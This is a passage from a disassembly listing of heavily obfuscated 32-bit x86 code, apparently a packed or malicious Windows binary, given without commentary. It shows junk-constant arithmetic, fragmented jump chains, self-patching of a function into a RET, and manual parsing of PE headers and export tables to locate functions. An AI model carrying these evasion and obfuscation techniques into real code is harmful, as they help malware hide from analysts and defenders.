sub_423D1C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_122. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423D33: ; CODE XREF: hjohnhn9:00426263�j
jmp loc_426D32
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD "+" TO EXPAND]
db 31h, 1, 0
dd 264E800h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_423D42: ; CODE XREF: sub_4279C0+3�j
jmp loc_4249CC
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_423D47: ; CODE XREF: sub_426A78+10B8�j
jz loc_425F1B
adc eax, ebp
jmp loc_425F15
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_423D54: ; CODE XREF: sub_4278DC:loc_424C01�j
adc ebx, 6A4E96E7h
js loc_427A24
xor esi, edi
jmp loc_427B35
; END OF FUNCTION CHUNK FOR sub_4278DC
; =============== S U B R O U T I N E =======================================
sub_423D67 proc near ; DATA XREF: hjohnhn9:00429046�o
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423201 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004236E4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00423CC8 SIZE 00000005 BYTES
push edi
push 1FC6F0D5h
xchg ebp, [esp+0]
mov edi, ebp
pop ebp
xor edi, 0C19381B4h
loc_423D79: ; CODE XREF: hjohnhn9:loc_426CF5�j
rol edi, 1Eh
loc_423D7C: ; CODE XREF: hjohnhn9:loc_424EC3�j
and edi, 12212D66h
jmp loc_423CC8
sub_423D67 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423D87: ; DATA XREF: sub_423B05+3F49�o
mov [ebp-4], eax
push 5076CEAEh
pop eax
add eax, 982C40ADh
sub eax, 33BDC7FFh
jmp loc_4274A4
; ---------------------------------------------------------------------------
test edx, ecx
jmp loc_428A5B
; ---------------------------------------------------------------------------
loc_423DA8: ; DATA XREF: sub_4237F4+1461�o
mov [ebp-0Ch], eax
cmp dword ptr [ebp-10h], 0
loc_423DAF: ; CODE XREF: hjohnhn9:00423A45�j
jnz loc_424F28
cmp dword ptr [ebp-0Ch], 5
jnz loc_424F28
mov eax, [ebp+8]
call sub_424F20
shr ecx, 9
jmp loc_425C93
; ---------------------------------------------------------------------------
loc_423DCF: ; CODE XREF: hjohnhn9:0042508C�j
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
push ecx
push 0D50AC7F6h
pop ecx
xor ecx, 0E03A3CE0h
add ecx, 0BA522053h
cmp ecx, 75766663h
jmp loc_42426B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_423DF6: ; CODE XREF: sub_42325E+8ED�j
xchg edi, [esp+0]
ror eax, 11h
call sub_42636C
loc_423E01: ; CODE XREF: hjohnhn9:00428059�j
jmp loc_428372
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
word_423E06 dw 0E0C1h ; DATA XREF: sub_42304F+1D40�o
dd 0EC558B02h, 31C528Bh, 0A5E9FC55h
db 0F5h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E98
loc_423E17: ; CODE XREF: sub_428E98+D�j
jbe loc_426E02
ja loc_42707F
xor esi, edi
; END OF FUNCTION CHUNK FOR sub_428E98
; START OF FUNCTION CHUNK FOR sub_428CC9
loc_423E25: ; CODE XREF: sub_428CC9:loc_4288C9�j
push 3C38EEE8h
pop eax
jmp loc_425B86
; END OF FUNCTION CHUNK FOR sub_428CC9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E54
loc_423E31: ; CODE XREF: sub_427E54-3D20�j
jmp loc_428EE5
; END OF FUNCTION CHUNK FOR sub_427E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_423E36: ; CODE XREF: sub_42325E+511D�j
add eax, 5343FABBh
sub eax, 544AEFF2h
xor eax, 0B530F9FEh
add eax, 3B007B8Dh
mov eax, [eax]
or eax, eax
jnz loc_423283
jmp loc_4276F7
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
cmp esi, ebx
jmp loc_4266BE
; =============== S U B R O U T I N E =======================================
sub_423E64 proc near ; CODE XREF: sub_4251EB-1F0B�p
; hjohnhn9:00425FF9�j
; FUNCTION CHUNK AT 004239A2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00423CF0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004272D3 SIZE 00000007 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 0FF7FCF00h
or eax, eax
jz loc_4239D3
jmp loc_423CF0
sub_423E64 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EEA
loc_423E7B: ; CODE XREF: sub_425EEA+B�j
call sub_425E49
loc_423E80: ; CODE XREF: sub_424631:loc_428567�j
mov eax, [ebp+8]
push offset loc_424996
jmp nullsub_16
; END OF FUNCTION CHUNK FOR sub_425EEA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_423E8D: ; CODE XREF: sub_426F5A+3E6�j
or esi, edx
loc_423E8F: ; CODE XREF: hjohnhn9:loc_427160�j
add edx, 0A2D9B284h
xor ebx, 802191BEh
loc_423E9B: ; CODE XREF: sub_426F5A:loc_42513C�j
call sub_424877
mov edx, 0F2B89A19h
call sub_4279ED
jmp loc_42365D
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
ror edx, 14h
jmp sub_427B51
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249E1
loc_423EB7: ; CODE XREF: sub_4249E1+C�j
mov eax, [ebp-14h]
push eax
push esi
call sub_427345
; END OF FUNCTION CHUNK FOR sub_4249E1
; START OF FUNCTION CHUNK FOR sub_426CE6
loc_423EC1: ; CODE XREF: sub_426CE6+A�j
jmp loc_4283E0
; END OF FUNCTION CHUNK FOR sub_426CE6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_423EC7: ; CODE XREF: sub_424819+46C0�j
jmp loc_42488B
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_423ECC: ; CODE XREF: sub_424161:loc_424F86�j
pop ecx
push offset loc_423C8D
jmp loc_4288F8
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_423ED7: ; CODE XREF: sub_424631:loc_426E35�j
shl eax, 3
mov edx, [ebp+8]
jmp loc_425164
; ---------------------------------------------------------------------------
loc_423EE2: ; CODE XREF: sub_424631:loc_426619�j
cmp dword ptr [ebp-10h], 0
jnz loc_42516C
mov eax, [ebp+8]
jmp loc_42729D
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D99
loc_423EF4: ; CODE XREF: sub_424D99-1170�j
jno loc_424EEC
loc_423EFA: ; CODE XREF: sub_424D99:loc_423C1A�j
xor ebx, 7AD55981h
add ebx, 0DC898EAh
call sub_428945
; END OF FUNCTION CHUNK FOR sub_424D99
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_423F0B: ; CODE XREF: sub_4262C5-2A16�j
jmp loc_423B1F
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A58
loc_423F10: ; CODE XREF: sub_427A58+C�j
call sub_42774F
loc_423F15: ; CODE XREF: sub_427E85:loc_426E75�j
push eax
call sub_427A36
call sub_4278B9
locret_423F20: ; CODE XREF: hjohnhn9:loc_425D6A�j
retn
; END OF FUNCTION CHUNK FOR sub_427A58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_423F21: ; CODE XREF: sub_425BD2:loc_424517�j
not esi
jnb loc_426EFE
js loc_425E20
ror ebp, 17h
jge loc_4263A0
jmp loc_427951
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_423F3D: ; CODE XREF: hjohnhn9:0042499D�j
; sub_427D9D-18D3�j ...
mov eax, [ebp-4]
call sub_424B30
loc_423F45: ; CODE XREF: sub_4238CC+2748�j
push 517EEA18h
pop eax
add eax, 86BC7F46h
rol eax, 1Fh
add eax, 0B296A58h
xor eax, 770F05C3h
jmp loc_427970
; END OF FUNCTION CHUNK FOR sub_424631
; =============== S U B R O U T I N E =======================================
sub_423F65 proc near ; DATA XREF: sub_42304F:loc_428AA2�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424A92 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424F8B SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00425220 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004252A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426C64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427550 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004275EE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428287 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428BF7 SIZE 00000010 BYTES
call sub_424A28
test al, al
jz loc_425220
jmp loc_4275EE
sub_423F65 endp
; =============== S U B R O U T I N E =======================================
sub_423F77 proc near ; CODE XREF: sub_424698+1�p
; hjohnhn9:00426A6B�j
; FUNCTION CHUNK AT 00423F91 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426B0E SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov ebp, esp
add esp, 0FFFFFFECh
jmp loc_426B0E
sub_423F77 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_423F86: ; CODE XREF: sub_424161+2B2F�j
adc edx, 0AEB1EF27h
jmp sub_423B84
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F77
loc_423F91: ; CODE XREF: sub_423F77:loc_426B0E�j
push offset loc_425257
jmp nullsub_23
; END OF FUNCTION CHUNK FOR sub_423F77
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
mov ch, [edi]
add es:[eax], al
jmp sub_425D27
; ---------------------------------------------------------------------------
loc_423FA6: ; CODE XREF: hjohnhn9:00428FC7�j
xchg esi, [esp]
pop esi
call sub_424AE3
jmp loc_4231DA
; ---------------------------------------------------------------------------
jmp locret_424ADD
; =============== S U B R O U T I N E =======================================
sub_423FB9 proc near ; CODE XREF: hjohnhn9:00425C78�j
; sub_423444:loc_4270EE�j ...
; FUNCTION CHUNK AT 004234D3 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add eax, 4622B2B0h
push offset loc_428B71
jmp loc_4234D3
sub_423FB9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_423FCD: ; CODE XREF: sub_426671-351�j
and ebp, 0D2F88BF4h
loc_423FD3: ; CODE XREF: sub_426671:loc_427895�j
call sub_424877
push 2F846F14h
pop edx
add edx, 0ADE8F686h
jmp loc_42316A
; END OF FUNCTION CHUNK FOR sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_423FE9: ; CODE XREF: sub_424A78:loc_4242DE�j
push 74F9BCB9h
pop esi
sub esi, 0A4C08EC8h
xor esi, 7E616109h
add eax, esi
jmp loc_427984
; END OF FUNCTION CHUNK FOR sub_424A78
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D99
loc_424003: ; CODE XREF: sub_424D99+12�j
jmp loc_423C1A
; END OF FUNCTION CHUNK FOR sub_424D99
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_424008: ; CODE XREF: sub_42466E-AB0�j
jz loc_427947
jmp loc_424542
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_424013: ; CODE XREF: sub_424819:loc_4282C4�j
xchg esi, [esp+0]
push 8B98A8E8h
xchg esi, [esp+4+var_4]
mov ebx, esi
pop esi
and ebx, 0F5022639h
jmp loc_423C02
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42402C: ; CODE XREF: sub_42466E-121�j
jnz loc_42857C
cdq
loc_424033: ; CODE XREF: sub_42466E:loc_423BB8�j
push edx
push 0E7131BE6h
jmp loc_427BEE
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_42403E: ; CODE XREF: sub_4265CD-1E7B�j
; hjohnhn9:004261FB�j
popf
jno loc_42888D
loc_424045: ; CODE XREF: sub_4265CD-1E89�j
sub eax, 74CBAB60h
or eax, 724E4ED9h
jmp loc_427A9C
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
loc_424056: ; DATA XREF: sub_423F65+4C98�o
add eax, 0D7B18CA1h
; START OF FUNCTION CHUNK FOR sub_424161
loc_42405C: ; CODE XREF: sub_424161:loc_4271FD�j
xchg eax, [esp+0]
jmp loc_424521
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_424064: ; CODE XREF: sub_427852:loc_42823F�j
mov eax, [eax+24h]
loc_424067: ; CODE XREF: sub_42363F+3E5A�j
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_4242E8
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_424073: ; CODE XREF: sub_428271-16ED�j
add eax, [esp+0]
jmp loc_42350B
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_42407B: ; CODE XREF: sub_423CDB:loc_427449�j
shr edx, 5
sbb ecx, 0CB4525A9h
jmp loc_427B9C
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
loc_424089: ; CODE XREF: hjohnhn9:00423490�j
push offset loc_423302
jmp locret_428297
; ---------------------------------------------------------------------------
shl edx, 4
jmp sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42409B: ; CODE XREF: sub_4260BD-23FE�j
jl loc_42833C
mov esi, eax
jns loc_4234D3
jmp loc_428337
; END OF FUNCTION CHUNK FOR sub_4260BD
; =============== S U B R O U T I N E =======================================
sub_4240AE proc near ; DATA XREF: sub_427345-3DBE�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426DBA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042769B SIZE 0000001A BYTES
mov eax, [ebp-4]
push edx
mov edx, eax
xchg edx, [esp+4+var_4]
jmp loc_426DBA
sub_4240AE endp
; =============== S U B R O U T I N E =======================================
sub_4240BC proc near ; CODE XREF: sub_428357-508C�p
; hjohnhn9:00428E34�j
; FUNCTION CHUNK AT 004234AC SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-8]
loc_4240C3: ; CODE XREF: hjohnhn9:00426ACC�j
shl eax, 0Fh
add [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
pop ebp
jmp loc_4234AC
sub_4240BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_4240D4: ; CODE XREF: sub_425CB3:loc_4232E6�j
xchg ecx, [esp+0]
push 0
call sub_4270CF
push eax
mov eax, esp
jmp loc_4244B2
; END OF FUNCTION CHUNK FOR sub_425CB3
; =============== S U B R O U T I N E =======================================
sub_4240E6 proc near ; CODE XREF: hjohnhn9:0042430A�p
; hjohnhn9:00426CFD�j
; FUNCTION CHUNK AT 0042744E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428AFF SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
cmp ds:dword_426E3C, 0
jnz loc_427FBF
lea edx, [ebp-14h]
jmp loc_428AFF
sub_4240E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4240FF: ; CODE XREF: hjohnhn9:00428ADE�j
jo loc_428F8E
add edi, eax
jmp loc_42476D
; ---------------------------------------------------------------------------
loc_42410C: ; CODE XREF: hjohnhn9:00423478�j
add eax, 28h
mov [ebp-4], eax
jmp loc_4266B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269BD
loc_424117: ; CODE XREF: sub_4269BD+17�j
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
push offset loc_427C74
jmp loc_4266AB
; END OF FUNCTION CHUNK FOR sub_4269BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E54
loc_424127: ; CODE XREF: sub_427E54+11�j
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
jmp loc_423E31
; END OF FUNCTION CHUNK FOR sub_427E54
; ---------------------------------------------------------------------------
js loc_427FB5
push ecx
jmp sub_427345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_424145: ; CODE XREF: sub_42345B+544D�j
add ecx, 0E02DF608h
xchg ecx, [esp+4+var_4]
jmp loc_426B55
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_424153: ; CODE XREF: sub_424698-D92�j
jz loc_4261D5
jmp loc_4241A5
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D1C
loc_42415E: ; CODE XREF: sub_423D1C+10�j
ror edi, 1Ch
; END OF FUNCTION CHUNK FOR sub_423D1C
; =============== S U B R O U T I N E =======================================
sub_424161 proc near ; CODE XREF: sub_424A78:loc_4242D9�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042312B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004231F0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004234B1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00423B50 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423C90 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423CC4 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00423ECC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423F86 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042405C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424521 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042457E SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00424D68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424F86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004251B2 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00425BB8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426054 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00426655 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426C7F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00426E7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004271FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004279DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427BE6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004284ED SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004285C1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004288F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429022 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
jno loc_4285C1
test byte ptr [ebp-8], 40h
jz loc_423C90
push ebp
jmp loc_427BE6
sub_424161 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42417B: ; CODE XREF: hjohnhn9:00426736�j
jns loc_426C3C
; =============== S U B R O U T I N E =======================================
sub_424181 proc near ; CODE XREF: sub_426098+C�p
; FUNCTION CHUNK AT 004283C4 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
jmp loc_4283C4
sub_424181 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E85
loc_42418D: ; CODE XREF: sub_427E85+10�j
push eax
call sub_427A36
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_423415
call sub_4242A0
; END OF FUNCTION CHUNK FOR sub_427E85
; START OF FUNCTION CHUNK FOR sub_424698
loc_4241A5: ; CODE XREF: sub_424698-53F�j
jmp loc_428BE8
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
loc_4241AA: ; CODE XREF: hjohnhn9:00426E2F�j
push 87A17FD1h
pop esi
xor esi, 8FC8532Bh
rol esi, 13h
jmp loc_428B6C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_4241BE: ; CODE XREF: sub_423BC3:loc_425F6E�j
mov eax, edi
pop edi
and eax, 986F907Ch
test eax, 10h
jmp loc_427A7E
; END OF FUNCTION CHUNK FOR sub_423BC3
; =============== S U B R O U T I N E =======================================
sub_4241D2 proc near ; CODE XREF: sub_427B51+17�j
; FUNCTION CHUNK AT 004242D6 SIZE 00000003 BYTES
push ebp
mov eax, [ebp-20h]
call sub_428162
loc_4241DB: ; CODE XREF: sub_427FCE+A�j
jmp loc_4242D6
sub_4241D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4241E0: ; CODE XREF: hjohnhn9:004242FB�j
push ebp
; =============== S U B R O U T I N E =======================================
sub_4241E1 proc near ; CODE XREF: sub_425D47+9�p
; FUNCTION CHUNK AT 0042310F SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
add [ebp-8], eax
push offset sub_423921
jmp loc_42310F
sub_4241E1 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4241F3 proc near ; CODE XREF: sub_4244F5+18�p
; hjohnhn9:00428299�j
xchg esi, [esp+0]
pop esi
add eax, [ebp-4]
call sub_427F90
cmp eax, [ebp-8]
call sub_4290CF
locret_424207: ; CODE XREF: sub_42859A-D0A�j
retn
sub_4241F3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_424208: ; CODE XREF: sub_427C9B+79�j
jmp loc_428E0C
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
sub_42420D proc near ; DATA XREF: sub_42325E+5CC4�o
pop esi
mov word ptr [eax], 205Dh
call sub_424335
sub_42420D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42304F
loc_424218: ; CODE XREF: sub_42304F:loc_4260B8�j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_4273B2
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_4273B2
jmp loc_428079
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_424238: ; CODE XREF: sub_4244F5:loc_424512�j
jl loc_424B00
xchg ebx, [eax]
sbb ebx, 0E185253Bh
jmp loc_424AF9
; END OF FUNCTION CHUNK FOR sub_4244F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42424B: ; CODE XREF: sub_42466E:loc_427DC7�j
jl loc_426433
; END OF FUNCTION CHUNK FOR sub_42466E
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_424251: ; CODE XREF: sub_427AC0-1714�j
jmp loc_42390C
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
adc edx, 0F4D044CAh
jmp loc_42642D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_424261: ; CODE XREF: sub_42325E+3EFD�j
call sub_427AC0
; END OF FUNCTION CHUNK FOR sub_42325E
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_424266: ; CODE XREF: sub_425BD2+134D�j
jmp loc_4286F1
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
loc_42426B: ; CODE XREF: hjohnhn9:00423DF1�j
jl loc_423D06
or edi, 0C113892Dh
jmp loc_423CFC
; ---------------------------------------------------------------------------
push offset sub_423D1C
jmp loc_423B39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D64
loc_424286: ; CODE XREF: sub_428D64-20�j
mov cl, [ebp-0Bh]
xor edx, edx
mov dl, [ebp-9]
shr edx, cl
jmp loc_42876C
; END OF FUNCTION CHUNK FOR sub_428D64
; ---------------------------------------------------------------------------
and ebp, eax
jmp loc_42429D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42429D: ; CODE XREF: hjohnhn9:00424297�j
shl ecx, 0Ah
; =============== S U B R O U T I N E =======================================
sub_4242A0 proc near ; CODE XREF: sub_427E85-3CE5�p
; FUNCTION CHUNK AT 00427877 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
lea eax, [ebp-125h]
jmp loc_427877
sub_4242A0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4242AF: ; DATA XREF: sub_4285DF+2�o
push 0AFEC22B3h
pop ebx
and ebx, 5A0EB2A0h
add ebx, 1C34A6B3h
jmp loc_4271AE
; ---------------------------------------------------------------------------
loc_4242C6: ; CODE XREF: hjohnhn9:loc_42327E�j
cmp word ptr [eax], 5A4Dh
jnz loc_42476D
jmp loc_428414
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241D2
loc_4242D6: ; CODE XREF: sub_4241D2:loc_4241DB�j
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_4241D2
; START OF FUNCTION CHUNK FOR sub_424A78
loc_4242D9: ; CODE XREF: sub_42626F:loc_42302C�j
; sub_424A78+1A7�j ...
call sub_424161
loc_4242DE: ; CODE XREF: sub_428CAF-1C54�j
jmp loc_423FE9
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_4242E3: ; CODE XREF: sub_424819+15D�j
jmp nullsub_91
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_4242E8: ; CODE XREF: sub_427852-37E4�j
jmp loc_428DDF
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
push ebp
mov ebp, eax
xchg ebp, [esp]
push ecx
jmp loc_4245DF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cdq
jmp loc_4241E0
; ---------------------------------------------------------------------------
loc_424300: ; DATA XREF: sub_424877-222�o
mov eax, offset dword_425AEC
call sub_427C43
call sub_4240E6
loc_42430F: ; CODE XREF: hjohnhn9:00428CFB�j
jmp loc_42783E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_424314: ; CODE XREF: sub_424631:loc_426650�j
mov eax, [ebp+8]
mov eax, [eax-10h]
and eax, 7
mov [ebp-14h], eax
cmp dword ptr [ebp-10h], 3
jnb loc_424F28
jmp loc_4277A2
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_42432F: ; CODE XREF: hjohnhn9:00423B33�j
jns loc_426D35
; =============== S U B R O U T I N E =======================================
sub_424335 proc near ; CODE XREF: sub_42420D+6�p
; FUNCTION CHUNK AT 00425147 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428723 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_424AAE
push eax
pop edx
jmp loc_428723
sub_424335 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424345 proc near ; CODE XREF: hjohnhn9:00426E81�j
; sub_427C9B+38�p
xchg esi, [esp+0]
pop esi
call sub_424354
retn
sub_424345 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_42434F: ; CODE XREF: sub_4278EC-4D5�j
jmp nullsub_43
; END OF FUNCTION CHUNK FOR sub_4278EC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
